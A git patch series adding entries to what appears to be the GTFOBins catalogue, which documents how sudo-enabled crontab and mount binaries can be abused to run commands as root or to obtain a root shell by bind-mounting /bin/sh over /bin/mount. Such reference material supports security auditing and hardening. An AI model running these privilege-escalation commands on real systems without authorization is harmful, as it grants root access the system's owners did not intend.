From 85b99ce89fec809ad7dc48ef173b0ad8b8f37241 Mon Sep 17 00:00:00 2001
From: kk <kai@kunfoo.org>
Date: Mon, 16 Jul 2018 10:00:14 +0200
Subject: [PATCH 1/3] added crontab and mount

---
 _gtfobins/crontab.md | 7 +++++++
 _gtfobins/mount.md   | 8 ++++++++
 2 files changed, 15 insertions(+)
 create mode 100644 _gtfobins/crontab.md
 create mode 100644 _gtfobins/mount.md

diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md
new file mode 100644
index 0000000..c431725
--- /dev/null
+++ b/_gtfobins/crontab.md
@@ -0,0 +1,7 @@
+---
+functions:
+  sudo-enabled:
+  - description: edit root's crontab and run arbitrary commands as root.
+    code: |
+      sudo crontab -e
+---
diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md
new file mode 100644
index 0000000..d76c4ff
--- /dev/null
+++ b/_gtfobins/mount.md
@@ -0,0 +1,8 @@
+---
+functions:
+  sudo-enabled:
+  - description: bind mount bash to the mount binary, as mount is sudo enabled.
+    code: |
+      sudo mount -o bind /bin/bash /bin/mount
+      sudo mount
+---

From e50f44521ec2656dcfeda2df433587ca31fd41d8 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 16 Jul 2018 13:37:17 +0200
Subject: [PATCH 2/3] Improve crontab

---
 _gtfobins/crontab.md | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/crontab.md b/_gtfobins/crontab.md
index c431725..12ac6ae 100644
--- a/_gtfobins/crontab.md
+++ b/_gtfobins/crontab.md
@@ -1,7 +1,9 @@
 ---
 functions:
+  execute-non-interactive:
+  - description: The commands are executed according to the crontab file edited via the `crontab` utility.
+    code: crontab -e
   sudo-enabled:
-  - description: edit root's crontab and run arbitrary commands as root.
-    code: |
-      sudo crontab -e
+  - description: The commands are executed according to the crontab file edited via the `crontab` utility.
+    code: sudo crontab -e
 ---

From a00f6897600e2a11d52aa7be8f8401414ec71106 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Mon, 16 Jul 2018 13:47:09 +0200
Subject: [PATCH 3/3] Improve mount

---
 _gtfobins/mount.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/mount.md b/_gtfobins/mount.md
index d76c4ff..104e35e 100644
--- a/_gtfobins/mount.md
+++ b/_gtfobins/mount.md
@@ -1,8 +1,8 @@
 ---
 functions:
   sudo-enabled:
-  - description: bind mount bash to the mount binary, as mount is sudo enabled.
+  - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
     code: |
-      sudo mount -o bind /bin/bash /bin/mount
+      sudo mount -o bind /bin/sh /bin/mount
       sudo mount
 ---